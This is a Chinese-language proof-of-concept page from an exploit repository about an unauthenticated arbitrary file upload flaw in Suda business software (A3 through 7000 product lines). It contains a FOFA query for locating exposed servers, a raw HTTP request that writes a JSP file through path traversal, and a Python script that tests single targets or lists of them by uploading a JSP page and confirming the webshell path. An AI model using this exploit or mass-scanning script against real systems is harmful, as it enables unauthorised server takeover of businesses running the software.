admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/速达软件全系产品存在任意文件上传漏洞.md

79 lines
3.0 KiB
Markdown
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## 速达软件全系产品存在任意文件上传漏洞
速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.
## 影响版本
```
速达A3.cloudBAS、速达A3.cloudSTD、速达A30.cloudPRO、速达3000.onlinePRO、速达A4.cloudBAS、速达A4.cloudSTD
速达A40.cloudPRO、速达4000.onlinePRO、速达A5.cloudSTD、速达A50.cloudPRO、速达A70.cloudPRO
速达5000.onlinePRO、速达7000.onlinePRO
```
## fofa
```
app="速达软件-公司产品"
```
## poc
```
POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28
<% out.print("984969719");%>
```
## 批量脚本
```python
import requests
import argparse
poc = "/report/DesignReportSave.jsp?report=../625248.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Mobile Safari/537.36",
"Content-Type": "application/octet-stream"
}
data = '''<% out.print("This is a page !");%>'''
def chack(url):
try:
url = "http://"+url
reps = requests.post(url=url+poc,headers=headers,data=data,verify=False,timeout=5)
shell_path = url+"/625248.jsp"
repps = requests.get(url=shell_path,headers=headers,verify=False,timeout=3)
if repps.status_code == 200:
print(f"[+] 存在速达软件存在任意文件上传 url : {shell_path}")
else:
print(f"未发现速达软件存在任意文件上传 url : {url}")
except Exception as e:
print(f"ERROR : {e}")
def main():
parser = argparse.ArgumentParser(description='速达软件全系产品存在任意文件上传')
parser.add_argument('-u', '--url', type=str, help='URL to process')
parser.add_argument('-f', '--file', type=str, help='File path to process')
args = parser.parse_args()
if args.url:
chack(args.url)
elif args.file:
with open(args.file, 'r') as file:
lines = file.readlines()
for line in lines:
chack(line.strip())
else:
print("eg : python3 速达软件全系产品存在任意文件上传.py -u http://xx.xx.x.x")
print("eg : python3 速达软件全系产品存在任意文件上传.py -f 123.txt")
if __name__ == '__main__':
main()
```
Reference in New Issue View Git Blame Copy Permalink